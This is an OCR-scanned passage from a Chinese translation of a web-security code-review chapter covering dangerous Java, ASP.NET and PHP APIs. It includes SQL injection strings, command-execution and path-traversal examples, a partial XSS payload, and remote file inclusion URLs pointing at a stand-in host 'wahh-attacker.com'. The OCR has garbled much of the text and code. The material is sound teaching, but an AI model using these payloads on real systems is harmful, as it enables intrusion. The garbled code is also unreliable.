下 面 的 API 更 加 稳定 可 靠 ， f 金玲 代 前 面 描 壕 的 APL 允许 应 用 程 
序 创建 一 个 预先 编译 的 SQL 语句 ， 并 以 可 靠 且 类 型 安全 的 方式 指定 它 
的 参数 占 位 符 的 值 : 
g java.sql.Connection.prepareStatement 
g java.sql.PreparedStatement.setString 
g java.sql.PreparedStatement.setInt 
g java.sql.PreparedStatement.setBoolean 
g java.sql.PreparedStatement.setObject 
g java.sql.PreparedStatement.execute 
g java.sql.PreparedStatement.executeQuery 
当然 还 有 许多 ， 此 处 不 一 一 列 出 。 
如 果 按 正常 的 方式 使 用 ， 这 些 API 就 不 易 受 到 SQL 注入 攻击 。 例 
H: 


String username = "admin' or 1=1--"; 
String password = "foo"; 
Statement s = connection.prepareStatement { 
“SELECT * FROM users WHERE username = ? AND password = ?"}; 
S.serString(1, username); 
s.setString(2, password); 
s.executeQuery(}; 


它 生 成 的 查询 等 同 于 ， 


SELECT * FROM users WHERE username = ‘admin'' or 1=1--' AND 


password = 'foo' 


动态 代码 执行 

Java 语言 本 身 并 不 包 舍 任 何 动态 评估 Java 源 代码 的 机 制 ， 尽 管 一 
些 应 用 (主要 在 数据 库 产品 中 ) 提供 了 评 佑 方法。 如 果 所 审查 的 应 用 
程序 动态 构建 任何 Java 代 码 ， 融 应 该 了 解 应 用 程序 如 何 构建 这 些 代 
码 ， 并 决定 用 户 可 控制 的 数据 是 否 以 危险 的 方式 使 用 。 

4. OS 命令 执行 

下 面 的 API 用 于 在 Java 应 用 程序 中 执行 外 部 操作 系统 命令 

DQ java.lang.runtime.Runtime.getRuntime 

g java.lang.runtime.Runtime.exec 


如 果 提 区 给 exec 的 字符 串 参 数 完 全 可 由 用 户 控制 ， 那 么 几乎 可 以 
肯定 应 用 程序 易于 受到 任何 命令 执行 攻击 。 例 如 ， 下 面 的 代码 将 运行 
Windows calc 程 序 : 


String userinput = "calc"; 


Runtime.getRuntime. exec (userinput); 


然而 ， 如 有 果 用 户 仅 能 够 控制 提交 给 exec 的 部 分 字符 串 ， 那 么 应 用 
程序 可 能 不 易于 受到 攻击 。 在 下 面 的 示例 中 ， 用 户 可 控制 的 数据 以 命 
令 行 参数 的 形式 提交 给 记事 本 进程 ， 引 起 它 壬 试 加 载 | calc 文 档 : 


String userinput = "| calc"; 


Runtime.getRuntime.exec("notepad “ + userinput); 


exec API 本 吴 并 不 解释 & 与 | 等 shell 元 字符 ， 因 此 这 个 攻击 失败 。 
有 时 ， 仅 控制 部 分 字符 串 提 区 给 exec 仍 然 足以 执行 任意 命令 ; 例 
如 下 面 这 个 稍微 不 同 的 示例 〈 注 意 notepad 后 面 缺 少 一 个 空格 ) : 


String userinput = "\\..\\system32\\calc"; 
Runtime.getRuntime().exec("notepad" + userinput) ; 


通常 ， 在 这 种 情况 下 ， 应 用 程序 将 易于 受到 除 代 码 执行 以 外 的 攻 
击 。 例 如 ， 如 果 应 用 程序 以 用 户 可 控制 的 参数 作为 目标 URL 执 行 wget 
程序 ， 那 么 攻击 者 就 可 以 同 wget 进 程 传递 危险 的 命令 行 参数 ， 例 如 ， 
致使 它 下 载 一 个 文档 ， 并 将 该 文档 保存 在 文件 系统 中 的 任何 位 置 。 

5. URL 重 定向 

下 面 的 API 用 于 在 Java 中 发 布 HTTP 重 定向 : 

DQ javax.servlet.http.HttpServletResponse.sendRedirect 

DQ javax.servlet.http.HttpServletResponse.setStatus 

DQ javax.servlet.http.HttpServletResponse.addHeader 

通常 ， 使 用 sendRedirect 方 法 可 以 引起 一 个 重 定向 响应 ， 该 方法 接 
受 一 个 包含 相对 或 绝对 URL 的 字符 串 。 如 果 这 个 字符 捉 的 值 由 用 户 控 
制 ， 那 么 应 用 程序 可 能 易于 受到 钓鱼 攻击 。 

还 应 该 审查 setStatus 与 addHeader API 的 所 有 用 法 。 如 果 某 个 重 定 
向 包含 一 个 含有 HTTP Location 消 息 头 的 3xx 吧 应 ， 应 用 程序 天 可 能 使 
用 这 些 API 执 行 重 定 同 。 

6. ERF 


java.net.Socket 类 从 它 的 构造 本 数 中 提取 与 目标 主机 和 端口 有 关 的 
各 种 信息 ， 如 果 用 户 能够 以 某 种 方式 控制 这 些 信 息 ， 攻 击 者 瓯 可 以 利 
用 应 用 程序 与 任意 主机 建立 网 络 连接 ， 无 论 这 些 主机 位 于 因特网 上 、 
私有 DMZ 中 还 是 在 应 用 程序 上 运行 的 内 部 网 络 内 。 


19.3.4 ”配置 Java 环 境 


web.xml 文 件 包含 Java 平 台 环 境 的 配置 设置 ， 同 时 它 还 控制 着 应 用 
程序 的 行为 。 如 果 应 用 程序 使 用 容器 安全 管理 ， 那 么 验证 与 授权 将 在 
web.xml 文 件 中 ， 根 据 被 保护 的 每 一 个 资源 或 资源 集 ， 于 应 用 程序 代码 
以 外 声明 。 可 在 web.xml 文 件 中 设置 的 配置 选项 如 表 19-3 所 示 。 


表 19-3 Java 环境 中 与 安全 有 关 的 配置 设置 


设 置 Hi ptt 

login-config 元 素 配 置 验证 细 方 

login-config 两 类 验证 分 别 为 forms-based (页 面 由 form-login-page 
元 素 指 定 ) 与 在 
auth-method 元 素 中 指定 的 Basic Auth 或 Client-Cert 
如 果 使 用 基于 表单 的 验证 ， 指 定 的 表单 必须 将 操作 定 
义 为 j_security_check， 并 必 
须 提 交 j_username 与 j password 参 数 。Java 应 用 程序 将 
把 它 当 做 一 个 登录 请 求 处 理 


security- 如 果 定 义 了 login-config 元 素 ， 就 可 以 使 用 security- 
constraint constraint 元 素 限 定 资 


源 。 这 个 元 素 可 用 于 定义 受 保护 的 资源 
在 security-constraint 元 素 中 ， 可 以 使 用 url-pattern 元 素 
定义 资源 集 。 例 如 : 
<url-pattern>/admin/*</url-pattern> 
分 别 在 role-name 与 principal-name 元 素 中 定义 的 角色 
与 主要 用 户 可 以 访问 这 些 
资源 
session-config ”session-timeout 元 素 配 置 会 话 超时 (单位 :分 钟 ) 
error-page error-page 元 素 定 义 应 用 程序 如 何 处 理 错误 。 通 过 
error-code 与 exceptiontype 


元 素 可 单独 处 理 HTTP 错 误 代 码 与 Java 异 常 
init-param ”init-param 元 素 配 置 各 种 初始 化 参数 。 其 中 包括 与 安 
全 有 天 的 设置 : 
Dlistings 应 设置 为 false 


g debug Miz E70 


Servlet 可 以 使 用 HttpServletRequest.isUserInRole 访 问 Servlet 代 码 中 
的 相同 角色 信息 ， 实 施 编程 检查 。 有 映射 项 security-role-ref 将 内 置 的 角色 
检查 与 对 应 的 容 需 角色 连接 起 来 。 

除 web.xml 文 件 外 ， 不 同 应 用 程序 服务 器 还 可 能 使 用 包含 其 他 安全 
相关 设置 的 次 要 部 署 文件 (如 weblogic.xml 文 件 ) ， 当 分 析 环 境 配置 


时 ， 应 检查 这 些 设置 。 


19.4 ASP.NET 


本 节 主 要 介绍 在 ASPNET 平 台 上 获取 用 户 提交 的 输入 的 方法 、 与 
用 户 会 话 交互 的 方式 、 其 中 存在 的 潜在 危险 的 API 以 及 与 平台 安全 相 
关 的 配置 选项 。 


19.4.1 用 户 
ASP.NET 应 用 程序 通过 System.Web.HttpRequest 类 获取 用 户 提 区 的 


输入 。 这 个 类 中 包含 大 量 Web 应 用 程序 用 于 访问 用 户 提交 的 数据 的 属 
性 和 方法 。 表 19-4 列 出 的 API 可 用 于 获取 用 户 请 求 中 的 数据 。 


表 19-4 ASP.NET 平 台中 用 于 获取 用 户 提交 的 数据 的 API 


API 描 述 
Params 以 String 名 称 与 String 值 的 形式 保存 URL 碍 询 字符 串 、 


POST 请 求 主 体 、HTTP 
cookie 以 及 其 他 服务 器 变量 中 的 参数 。 这 个 属性 返回 
这 些 参数 类 型 的 集合 


Item 返回 Param 集 合 中 的 命名 项 
Form 返回 用 户 提 交 的 表单 变量 名 称 与 变量 值 集合 


QueryString ”返回 请 求 查 询 字 符 串 中 变量 名 称 与 变量 值 的 集合 
ServerVariables 返回 大 量 ASP 服 务 器 变量 《类 似 于 CGI 变量 ) 名 称 与 
PNR 包括 请 求 原始 | 
数据 、 查 询 字 符 串 、 请 求 方法 、HTTP Host 消 息 头 等 


Headers 以 String 名 称 与 String 值 之 间 的 映射 的 形式 保存 请 求 中 
的 HTTP 消息 头 ， 使 用 这 
个 属性 可 以 访问 该 映射 
Url 这 些 属 性 返回 请 求 中 的 URL 人 信息， 包括 查询 字符 串 
RawUrl 


UrlReferer 返回 与 在 请 求 的 HTTP Referer 消 息 头 中 指定 的 URL 有 
关 的 信息 


Cookies 返回 Cookie 对 象 的 集合 ， 其 中 包含 请 求 所 收 到 的 
cookie 的 信息 ， 包 括 它 们 的 名 称 


Files 返回 用 户 上 传 的 文件 集合 

InputStream 这些 API 返 回 客户 端 送 出 的 原始 请 求 的 不 同 表示 形 

BinaryRead ” 式 ， 因 此 可 用 于 访问 其 他 所 有 API 
获得 的 任何 信息 

HttpMethod ” 返回 HTTP 请 求 所 使 用 的 方法 

Browser 返回 用 户 浏览 需 的 信息 ， 与 在 HITP User-Agent 消 息 

UserAgent 头 中 提交 的 信息 类 似 

AcceptTypes ”返回 客户 端 支 持 的 MIME 类 型 的 字符 串 数组 ， 与 在 
HTTP Accept 消 息 头 中 提交 的 信 
AAW 

UserLanguages 返回 包含 客 户 端 所 接受 的 语言 的 字符 串 数 组 ， 与 在 
HTTP AcceptrLanguage 消 息 
头 中 提交 的 信息 类 似 


19.4.2 ”会话 交互 
_ASPNET 应 用 程序 以 各 种 方式 与 用 户 会 话 进行 交互 ， 以 保存 和 检 


ZAN 


使 用 Session 属 性 可 轻松 保存 和 检索 当前 会 话 中 的 信息 。 这 个 属性 
的 访问 方式 与 任何 其 他 索引 集合 类 似 : 


“三 要 
Session["MyName"] = txtMyName. Text; /7 保存 用 户 避 


ibiwelcome.Text = "Welcome *+Session["MyName"]; // 检 索 用 户 名 


ASP.NET 个 性 化 配置 与 Session 属 性 的 用 法 非常 相似 ， 其 唯一 不 同 
之 处 在 于 ， 前 者 相对 于 一 个 特定 的 用 户 ， 因 此 在 相同 用 户 的 不 同 会 话 
中 持续 保存 不 变 。 在 不 同 的 会 话 中 ， 用 户 的 续 份 通过 验证 机 制 或 一 个 
特殊 的 持久 性 cookie 得 以 重新 确认 。 在 用 户 个 性 化 配置 中 ， 数 据 以 下 
列 方式 保存 和 检索 : 


Profile.MyName = txtMyName.Text; /1 保存 用 户 名 
lblWelcome.Text = "Welcome " + Profile.MyName; // 检 索 用 户 名 


另外 ，System.Web.SessionState.HttpSessionState 类 也 可 用 于 保存 和 
检索 会 话 中 的 信息 。 它 以 字符 串 名 称 与 对 象 值 之 间 映 射 的 方式 保存 信 
轧 ， 使 用 表 19-5 中 列 出 的 API 可 以 访问 这 个 映射 。 


表 19-5 ASPNET 平 台中 用 于 与 用 户 会 话 交互 的 API 


API 描 yi 
Add 于 会话 集 合 中 增加 一 个 数据 项 
Item 获取 或 设 定 集合 中 命名 数据 项 的 值 
Keys 返回 集合 中 所 有 数据 项 的 名 称 
GetEnumerator 
CopyTo 将 值 组 成 的 集合 复制 到 数组 中 


19.4.3 ”潜在 危险 的 API 


这 一 节 介 绍 一 些 常见 的 ASPNET API。 以 危险 的 方式 使 用 这 些 API 
可 能 会 造成 安全 漏洞 。 

1. 文件 访问 

System.IO.File 是 用 于 访问 ASPNET 文 件 最 主要 的 类 。 它 的 所 有 方 
法 都 是 静态 的 ， 并 且 没 有 公共 构造 函数 。 

这 个 类 的 37 个 方法 全 都 接受 一 个 文件 名 作为 参数 。 如 果 未 检查 其 
中 是 否 包含 点 -点 - 斜 线 序列 ， 就 提交 用 户 可 控制 的 数据 ， 就 会 造成 路 
ee SE ae ee ea 
a 


string userinput = "..\\boot.ini"; 
FileStream fs = Pile.Open("C:\\temp\\" + userinput, 


FileMode.OpenOrCreate); 


下 面 的 类 常用 于 读 取 与 写 入 文件 内 容 : 
口 System.IO.FileStream 

口 System.IO.StreamReader 

口 System.1O.StreamWriter 


它们 的 各 种 构造 函数 接受 一 个 文件 路 径 作 为 参数 。 如 采 提 区 用 户 
可 控制 的 数据 ， 这 些 构造 画 数 可 能 引入 路 径 过 历 漏 洞 。 例 如 : 


string userinput = "..\\foo. txt"; 
FileStream fs = new FileStream({("F:\\tmp\\" + userinput, 


FileMode.OpenOrCreate) ; 


2. 数据 库 访问 

ASPNET 有 许多 用 于 访问 数据 库 的 API， 下 面 的 类 主要 用 于 建立 并 
执行 SQL 语句 : 
口 System.Data.9qlClient.9qlCommand 
DSystem.Data.SqlClient.SqlDataAdapter 
口 System.Data.Oledb.OleDbCommand 
口 System.Data.Odbc.OdbcCommand 
口 System.Data.9qlServerCe.SdlCeCommand 

其 中 每 个 类 都 有 一 个 构造 男 数 ， 它 接受 一 个 包 售 SQL 语句 的 字符 
$, 而 且 每 个 类 都 有 一 个 CommandText 属 性， 可 用 于 获取 并 设 定 SQL 
语句 的 当前 值 。 如 果 适 当地 配置 一 个 命令 对 象 ， 通 过 调用 Execute 方 法 
即 可 执行 SQL 语句 。 

如 采用 户 提交 的 数据 属于 以 查询 执行 的 字符 串 的 一 部 分 ， 那 么 应 
用 程序 可 能 易于 受到 SQL 注入 攻击 。 例 如 : 


string username = "admin' or 1=1-- 

string password = "foo"; 

CdbcCommand c = new OdbcCommand(*SELECT * FROM users WHERE username = '" 
= username = "' AND password = “*' + password = *'", connection}; 


c.ExecuteNonQuery (}; 


mo Zs 4. Ay 
已 会 执行 不 良 查 询 : 
SELECT * FROM users WHERE username = ‘admin' or 1=1 
AND password = ‘foo' 


上 面 列 出 的 每 一 个 类 通过 它们 的 Parameters 属 性 文 持 预 处 理 语句 ， 
允许 应 用 程序 创建 一 个 包含 参数 占 位 符 的 SQL 语句 ， 并 以 可 靠 且 类 型 
安全 的 方式 设 定 这 些 占 位 符 的 值 。 如 果 按 正常 的 方式 使 用 ， 这 种 机 制 
束 不 易 受 到 SQL 注入 攻击 。 例 如 : 


string username = “admin' or 1=1 
string password = * 


OdbcCommana c = new OcbhbcCommana(“*SELECT * FROM users WHERE username = 


@username AND password = 6password”", connection); 
c.Parameters.Add(new OdbcParameter{"Gusername", OdbcTyr ext alue = 
username) ; 


Cc. Parameters.Accac(new OdbcParameter("Gpassword", OdbcType.Text).Value = 
password 


c.ExecuteNonQuery([); 
它 生 成 的 查询 等 同 于 : 


SELECT * FROM users WHERE username = ‘admin'' or 1=1--' 


AND password = 'foo' 


3. 动态 代码 执行 

VBScript 画 数 Eval 接 受 一 个 包含 VBScript 表 达 式 的 字符 串 自 变 量 。 
该 函数 求 出 这 个 表达 式 的 值 ， 并 返回 结 有 末 。 如 条 用 户 可 控制 的 数据 被 
合并 到 要 计算 值 的 表达 式 中 ， 那 么 用 户 束 可 以 执行 任意 命令 或 修改 应 
用 程序 的 逻辑 。 

函数 Execute 和 ExecuteGlobal 接 受 一 个 包含 ASP 代 码 的 字符 串 ， 这 
个 ASP 代 码 与 直接 出 现在 脚本 中 的 代码 的 执行 方式 完全 相同 。 冒 号 分 
隔 符 用 于 将 几 个 语句 连接 在 一 起 。 如 条 加 Execute 函数 提交 用 户 可 控制 
的 数据 ， 那 么 攻击 者 就 可 以 在 应 用 程序 中 执行 任意 命令 。 

4. OS 命令 执行 

下 面 的 API 可 以 各 种 方式 在 ASP.NET 应 用 程序 中 运行 外 部 进程 : 

g System.Diagnostics. Start.Process 

口 System.Diagnostics.Start.ProcessStartInfo 

在 对 对 象 调用 Start 之 前 ， 可 以 回 静 态 Process.Start 方 法 提交 一 个 文 
件 名 字符 串 ， 或 者 用 一 个 文件 名 配置 Process 对 象 的 StartInfo 属 性 。 如 
采 文 件 名 字符 串 可 完全 由 用 户 控 制 ， 那 么 应 用 程序 几乎 可 以 肯定 易于 
到 任意 命令 执行 攻击 。 例 如 ， 下 面 的 代码 将 运行 Windows calc 程 
re 


string userinput = "calc"; 
Process.Start(userinput) ; 


然而 ， 如 有 果 用 户 仅 能 够 控制 提交 给 Start 的 部 分 字符 串 ， 那 么 应 用 
程序 仍然 可 能 易于 受到 攻击 。 例 如 : 


SR 
string userinput = "..\\..\\..\\Windows\\System32\\calc"; 


Dr ` awe FTN Dy re oe ` Arr \ ma y Ñ Sorin ls 
Process.Start(*C:\\Program Files\\MyApp\\bin\\" + userinput) ; 


API 并 不 解释 & 与 | 等 shell 元 字符 ， 也 不 接受 文件 名 参数 中 的 命令 
行 参数 ， 因 此 ， 如 采用 户 仅 控 制 文件 名 参数 的 一 部 分 ， 这 种 攻击 是 唯 
一 能 够 成 功 的 攻击 。 

已 被 局 动 的 进程 的 命令 行 参 数 可 以 使 用 ProcessStartInfo 类 的 
Arguments 属 性 设 定 。 如 果 只 有 Arguments 参 数 可 由 用 户 探 制 ， 应 用 程 
序 仍然 易于 受到 除 代 码 执行 以 外 的 其 他 攻击 。 例 如 ， 如 果 应 用 程序 以 
用 户 可 控制 的 参数 作为 目标 URL 执 行 wget 程 序 ， 那 么 攻击 者 吏 可 以 癌 
wget 进 程 提交 危险 的 命令 行 参数 ， 例 如 ， 致 使 它 下 载 一 个 文档 ， 并 将 
该 文档 保存 在 文件 系统 中 的 任何 位 置 。 

5. URL 重 定向 

下 面 的 API 用 于 在 ASP.NET 中 发 布 一 个 HTTP 重 定向 : 

口 System.Web.HttpResponse.Redirect 

口 System.Web.HttpResponse.Status 

口 System.Web.HttpResponse.StatusCode 

口 System.Web.HttpResponse.AddHeader 

口 System.Web.HttpResponse.AppendHeader 

口 Server.Transfer 

通常 ， 使 用 HttpResponse.Redirect 方 法 可 以 引起 一 个 重 定 同 啊 应 ， 
该 方法 接受 一 个 包含 相对 或 绝对 URL 的 字符 串 。 如 果 这 个 字符 捉 的 值 
由 用 户 控制 ， 那 么 应 用 程序 可 能 易于 受到 钓鱼 攻击 。 

还 必须 确保 检查 Status/StatusCode 属 性 与 AddHeader/AppendHeader 
方法 的 用 法 。 如 果 某 个 重 定向 包 偏 一 个 含有 HTTP Location 消 息 头 的 
3xx 呆 应， 应 用 程序 就 可 能 使 用 这 些 API 执 行 重 定向 。 

Server.Transfer 方 法 有 时 也 可 用 于 实现 重 定 向 。 实 际 上 ， 这 个 方法 
并 不 能 实现 HITP 重 定 同 ， 而 是 应 根据 当前 请 求 修 改 被 服务 器 处 理 的 页 
面 。 因 此 ， 不 能 通过 破坏 它 重 定向 到 一 个 站 外 URL; 这 个 方法 对 攻击 
者 而 言 并 没有 多 大 用 处 。 

6. BRS 

System.Net.Sockets.Socket 类 用 于 创建 网 络 套 接 字 。 创 建 一 个 
Socket 对 象 后 ， 再 通过 调用 Connect 方 法 连接 这 个 对 象 ; 该 方法 接受 目 
标 主 机 的 IP 与 端口 信息 为 参数 。 如 果 用 户 能 够 以 某 种 方式 控制 这 些 主 
机 信息 ， 攻 击 者 就 可 以 利用 应 用 程序 与 任意 主机 建立 网 络 连 授 ， 无 论 


= 


rare lal 上 、 私 有 DMZ 中 还 是 在 应 用 程序 上 运行 的 内 部 网 
络 内 o 


19.4.4 ”配置 ASP.NET 环 境 


Web 根 目录 下 的 web.config XML 文件 包含 ASPNET 环 境 的 配置 设 
置 ， 它 还 控制 着 应 用 程序 的 行为 ， 如 表 19-6 所 示 。 


表 19-6 ” ”ASP.NET 环境 中 与 安全 有 关 的 配置 设置 


设 置 
httpCookies 


sessionState 


compilation 


customErrors 


httpRuntime 


Hi wW 
这 个 元 素 决定 与 cookie 有 关 的 安全 设置 。 如 采 
httpOnlyCookies 属 性 为 真 ， 那 么 cookie 将 被 
标记 为 HttpOnly， 因 而 不 能 被 客 户 端 脚本 直接 访问 。 如 
果 requireSSL 属 性 为 真 ，cookie 
将 被 标记 为 secure， 因 此 只 能 由 浏览 器 通过 HTTPS 请 求 


这 个 元 素 决 定 会 话 的 行为 。timeout 属 性 的 值 决定 一 个 空 
闲 会 话 的 到 期 时 间 (单位 分钟) 。 

如 果 regenerateExpiredSessionId 元 素 设 为 true (默认 情 
况 ) ， 那 么 在 收 到 一 个 到 期 

会 话 ID 后 ， 将 发 布 一 个 新 的 会 话 ID 

A A ILR RE ES ES AEE 面 中 ， 生 成 更 详 
细 的 调试 错误 信息 。 如 果 debug 属 性 

为 tue， 调 试 符号 将 包含 在 页 面 中 


这 个 元 素 决 定 ， 如 果 发 生 无 法 处 理 的 错误 ， 应 用 程序 是 
否 返 回 详 细 的 错误 消息 。 如 果 mode 属 

性 为 On 或 RemoteOnly， 那 么 应 用 程序 用 户 将 收 到 被 属 

性 defaultRedirect 确 认 的 页 面 ， 

而 不 是 系统 生成 的 详细 消息 

这 个 元 素 决 定 各 种 运行 时 设置 。 如 果 

enableHeaderChecking 属 性 为 true (默认 情况 ) ， 

ASPNET 将 在 请 求 消 息 头 中 检查 潜在 的 注入 攻击 ， 包 括 

跨 站 点 脚本 。 如 果 enable-VersionHeader 


属性 为 tue (默认 情况 ) ，ASP.NET 将 输出 一 个 详细 的 
版 本 字符 串 ， 攻 击 
者 可 利用 它 在 特定 版 本 的 平台 中 搜索 漏洞 


如 果 数 据 库 连 接 字 符 串 之 类 的 敏感 数据 保存 在 配置 文件 中 ， 应 使 
用 ASPNET“ 受 保护 配置 ”特性 加 密 这 些 数据 。 


19.5 PHP 


ANTI EES) 2B 7EPHPYE G ERHARD E > SR 
会 话 交 互 的 方式 、 其 中 存在 潜在 危险 的 API 以 及 与 平台 安全 相关 的 配 
置 选 项 。 
19.5.1 用 户 


PHP 使 用 一 系列 数组 变量 保存 用 户 提交 的 数据 ， 如 表 19-7 所 示 。 


表 19-7 ”PHP 平台 中 用 于 获取 用 户 提交 的 数据 的 变量 


ee 
— 这 个 数组 包含 在 查询 字 
人 答 串 中 提交 的 参数 。 这 


些 参 数 根据 其 名 称 访 
问 。 例 如 ， 在 下 面 的 
URL: 
https://wahh- 
app.com/search.php? 
query=foo 
查询 参数 的 值 使 用 以 下 
代码 访问 : 
$_GET[‘query’ ] 
$_POST $HTTP_POST_VARS 这 个 数组 包含 在 请 求 主 
体 中 提交 的 参数 
$ COOKIE $HTTP_COOKIE_VARS 这 个 数组 包含 在 请 求 主 
体 中 提交 的 cookie 
$ REQUEST 这 个 数组 包含 $_GET、 
$_ POST 与 $_ COOKIE 数 
组 中 的 所 有 数据 
$_FILES $HTTP_POST_FILES 这 个 数组 包含 在 请 求 中 
上 传 的 文件 


$_SERVER[‘REQUEST_METHOD’ ] 


$_SERVER[‘QUERY_STRING’] 


$_SERVER[‘REQUEST_URI’] 


$_SERVER[‘HTTP_ACCEPT?’ ] 


$_SERVER[‘HTTP_ACCEPT_CHARSET’ ] 


$_SERVER[‘HTTP_ACCEPT_ENCODING’ ] 


$_SERVER[‘HTTP_ACCEPT_LANGUAGE’ ] 


$_SERVER[‘HTTP_CONNECTION’ ] 


$_SERVER[‘HTTP_HOST’ ] 


$_SERVER[‘HTTP_REFERER’] 


$_SERVER[‘HTTP_USER_AGENT” ] 


$_SERVER[‘PHP_SELF’] 


包含 在 HTTP 请 求 中 使 用 
的 方法 

包含 在 请 求 中 提交 的 完 
EWF E 
包含 在 请 求 中 提交 的 完 
HURL 

包含 HTTP Accept 消 息 头 
的 内 容 

包含 HTTP Accept-charset 


消息 头 的 内 容 

包含 HTTP Accept- 
encoding 消 息 头 的 内 容 
包含 HTTP Accept- 


language} EALAIN 
包含 HTTP Connection 消 
已 头 的 内 容 

包含 HTTP Host 消 息 头 的 
内 容 

包含 HTTP Referer 消 息 头 
的 内 容 

包含 HTTP User-agent} 
已 头 的 内 容 

包含 当前 运行 脚本 的 名 
称 。 虽 然 攻击 者 无 法 欣 
制 脚本 名 称 ， 但 可 以 

在 这 个 名 称 后 附加 路 径 
信息 。 例 如 ， 如 果 一 个 
脚本 包含 以 下 代码 : 
<form action=“<?= 

$ SERVER[‘PHP_ SELF’ ] 
?>”> 

那么 攻击 者 就 可 以 设计 
诸如 下 面 的 跨 站 点 脚本 


攻击 : 


/search.php/"><script> 


5 AE PHP hy AEP aa DAD pec AY, RICE 
以 下 反常 情况 。 

口 $GLOBALS 是 一 个 包含 在 脚本 全 局 范围 内 定义 的 所 有 变量 的 引 
用 的 数组 。 使 用 它 可 以 根据 名 称 访问 其 他 变量 。 

口 如 果 配 置 指令 register_globals 被 激活 ，PHP 会 为 所有 请 求 参数 
( 即 $_ REQUEST 数 组 中 的 全 部 数据 ) 建立 全 局 变量 。 这 表示 ， 应 用 程 
序 可 通过 与 相关 参数 相同 的 名 称 引 用 一 个 变量 ， 从 而 访问 用 户 输入 。 
如 条 应 用 程序 使 用 这 种 方法 访问 用 户 提交 的 数据 ， 那 么 只 有 仔细 地 逐 
行 审查 代码 ， 才 能 确定 以 这 种 方式 使 用 的 变量 。 

口 除 前 面 提 到 的 标准 HTTP 消息 头 外 ，PHP 还 在 $_ SERVER 数组 中 
增加 了 一 个 数据 ， 用 于 处 理 在 请 求 中 收 到 的 任何 定制 HITP 消 轧 头 。 例 
如 ， 提 交 消 息 头 : 

生成 : 

$_SERVER['HTTP_FOO'] = "Bar" 

口 名 称 包 含 下 标 〈 方 括号 内 ) 的 输入 参数 被 自动 转换 为 数组 。 例 

如 ， 请 求 下 面 的 URL: 
https://wahh-app.com/search.php?query [a]=foo&kquery [b] =bar 

将 使 $_GETI'‘query’] 变 量 的 值 转换 成 一 个 包含 两 个 成 员 的 数组 。 
如 果 一 个 数组 被 提交 给 一 个 希望 收 到 标量 值 的 玉 数 ， 可 能 会 在 应 用 程 
序 中 出 现 无 法 预料 的 行为 。 


19.5.2 会话 交 互 
PHP 使 用 $_SESSION 数 组 保存 和 检索 用 户 会 话 中 的 信息 。 例 如 : 


$_SESSIONÍ 'MyName'] = $_GET/ username']; // store user's name 


echo "welcome " $_SRSSION[ 'MyName']; // retrieve user's name 


$HTTP_SESSION_VARS 数 组 的 用 法 与 上 面 的 数组 相同 。 


如 果 register_globals 被 激活 (195.477) ， 那 么 全 局 变量 将 通过 
以 下 方式 保存 在 当前 会 话 中 : 


os 


SMyName = $_GET['username']; 
session_register ("MyName") ; 


19.5.3 ”潜在 危险 的 API 


这 一 节 介 绍 一 些 常见 的 PHP API。 以 危险 的 方式 使 用 这 些 API 可 能 
会 造成 安全 漏洞 。 

1. 文件 访问 

PHP 中 包含 大 量 用 于 访问 文件 的 函数 ， 其 中 许多 接受 可 用 于 访问 
远程 文件 的 URL 和 其 他 结构 。 

下 面 的 函数 用 于 读 取 或 写 入 一 个 指定 文件 的 内 容 。 如 果 辐 这些 
API 提 交 用 户 可 控制 的 数据 ， 攻 击 者 就 可 以 利用 这 些 API 访 问 服务 器 文 
件 系统 上 的 任意 文件 。 

口 fopen 
口 readfile 
g file 
g fpassthru 
口 gZopen 
口 gzfile 
口 gzpassthru 
口 readgzfile 
LJ copy 
g rename 
g rmdir 
口 mkdir 
unlink 
g file_get_contents 
g file_put_contents 
g parse_ini_file 
下 面 的 函数 用 于 包含 并 执行 一 个 指定 的 PHP 脚 本 。 如 果 攻 击 者 能 
人 够 使 应 用 程序 执行 受 控 的 文件 ， 他 残 可 以 在 服务 右上 执行 任意 命令 。 
g include 
g include_once 


口 require 

DQ require_once 

g virtual 

请 注意 ， 即 使 无 法 包含 远程 文件 ， 但 如 条 攻击 者 可 回 服务 器 上 传 
任意 文件 ， 他 仍然 能 够 执行 任意 命令 。 

PHP 配 置 选 项 allow_url_fopen 可 用 于 防止 一 些 文件 函数 访问 远程 文 
件 。 但 是 ， 在 默认 情况 下 ， 这 个 选项 设 为 1 (表示 人 允许 远程 文件 ) : 
此 ， 表 19-8 中 列 出 的 协议 可 用 于 检索 远程 文件 。 


表 19-8 ”可 用 于 检索 远程 文件 的 网 络 协 议 


协 议 示 例 
HTTP, HTTPS http://wahh-attacker.com/bad.php 
FTP ftp://user:password@wahh-attacker.com/bad.php 
SSH ssh2.shell://user:pass@wahh-attacker.com:22/xterm 


ssh2.exec://user:pass@wahh-attacker.com:22/cmd 


即使 alow_url_fopen 设 为 0， 攻 击 者 仍然 可 以 使 用 表 19-9 列 出 的 方 
法 访问 远程 文件 (取决 于 所 安装 的 扩展 ) 。 


表 19-9 allow_url_fopen 设 为 0 时 仍然 可 用 于 访问 远程 文件 的 方法 


方 法 示 例 
SMB \\wahh-attacker.com\bad.php 
PHP 输 入 /输出 流 php://filter/resource=http://wahh-attacker.com/bad.php 
压缩 流 compress.zlib://http://wahh-attacker.com/bad.php 
音频 流 ogg://http://wahh-attacker.com/bad.php 


TZ 注解 PHP5.2 以 后 的 版 本 引入 了 一 个 新 的 选项 
allow_url_include， 默 认 情况 下 ， 该 选项 被 禁用 。 这 个 默认 的 配置 防 


止 前 面 提 到 的 方法 在 调用 文件 包含 函数 时 用 于 指定 一 个 远程 文件 。 


2. 数据 库 访问 

下 面 的 函数 用 于 向 数据 库 发 送 一 个 查询 并 检查 查询 结 

口 mysql_query 

口 mssql_query 

LJ pg_query 

SQL 语句 以 一 个 简单 的 字符 串 提 交 。 如 采用 户 可 控制 的 数据 属于 
pe ae 那么 应 用 程序 就 可 能 容易 受到 SQL 注入 攻击 。 
列 如 : 


$username = “admin' or 1=1--"; 
Spassword = "foo"; 


S$sql="SELECT * FROM users WHERE username = 'Susername' 
AND password = 'Spassword'"; 
$result = mysql_query ($sql, $link) 
Ath 4 AN 
已 会 执行 不 良和 查询 
SELECT * FROM users WHERE username = 'admin' or 1=1--' 


AND password = 'foo' 


下 面 的 函数 可 用 于 创建 预 处 理 语句 ， 人 允许 应 用 程序 建立 一 个 包含 
参数 占 位 符 的 SQL 查询 ， 并 以 可 靠 而 且 类 型 安全 的 方式 设 定 这 些 占 位 
符 的 值 : 

g mysqli->prepare 

口 Stmt->prepare 

口 stmt->bind_param 

口 stmt->execute 

口 odbc_prepare 
人 eee 
列 如 : 


$username = “admin' or i=1 
Spassword = "foo"; 


